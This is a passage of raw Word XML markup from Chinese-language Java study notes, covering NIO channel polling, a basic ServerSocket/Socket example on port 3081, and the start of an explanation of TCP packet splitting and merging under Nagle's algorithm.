      </w:r>
      <w:r w:rsidRPr="00347E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>对注册的通道进行轮询操作即可实现异步读写，从而简化</w:t>
      </w:r>
      <w:r w:rsidRPr="00347E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00347E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>的编程模型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F512D8" w:rsidRPr="00F41A4C" w:rsidRDefault="001F60BD" w:rsidP="001F60BD">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0.4</w:t>
      </w:r>
      <w:r w:rsidR="00B54BC4" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="008B5BA3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ServerSocket</w:t>
      </w:r>
      <w:r w:rsidR="00B566B8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="008B5BA3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F512D8" w:rsidRPr="00F41A4C" w:rsidRDefault="00BC4FEA" w:rsidP="00F512D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ServerS</w:t>
      </w:r>
      <w:r w:rsidR="00B54BC4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ocket </w:t>
      </w:r>
      <w:r w:rsidR="00B54BC4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>建立的是</w:t>
      </w:r>
      <w:r w:rsidR="00B54BC4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidR="00B54BC4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的服务端，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00B54BC4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ocket</w:t>
      </w:r>
      <w:r w:rsidR="00B54BC4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>建立的是客户端。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A40C2" w:rsidRPr="00F41A4C" w:rsidRDefault="000A40C2" w:rsidP="000A40C2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>创建服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>并开放</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3081</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ServerSocket server=new ServerSocket(3081);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A16894" w:rsidRDefault="000A40C2" w:rsidP="000A40C2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>监听服务器端口，一旦有数据发送过来，那么就将数据封装成</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果没有数据发送过来，那么这时处于线程阻塞状态，不会向下继续执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>socket=server.accept();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526875" w:rsidRPr="00F41A4C" w:rsidRDefault="00526875" w:rsidP="00526875">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>分包与粘包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13436" w:rsidRPr="00E13436" w:rsidRDefault="00FD44D7" w:rsidP="00E13436">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>先说</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：由于</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议本身的机制（面向连接的可靠地协议</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>三次握手机制）客户端与服务器会维持一个连接（</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Channel</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>），数据在连接不断开的情况下，可以持续不断地将多个数据包发往服务器，但是如果发送的网络数据包太小，那么他本身会启用</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Nagle</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>算法（可配置是否启用）</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00FB495C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对较小的数据包进行合并（</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>基于此，</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的网络延迟要</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的高些）然后再发送（超时或者包大小足够）。那么这样的话，服务器在接收到消息（数据流）的时候就无法区分哪些数据包是客户端自己分开发送的，这样产生了粘包；服务器在接收到数据库后，放到缓冲区中，如果消息没有被及时从缓存区取走，下次在取数据的时候可能就会出现一次取出多个数据包的情况，造成粘包现象（确切来讲，对于基于</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议的应用，不应用包来描述，而应</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>流来描述），个人认为服务器接收端产生的粘包应该与</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>内核处理</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的方式</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> select</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>轮询机制的线性扫描频度无关。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13436" w:rsidRPr="00E13436" w:rsidRDefault="00FD44D7" w:rsidP="00E13436">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>再说</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidR="00E13436" w:rsidRPr="00E13436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
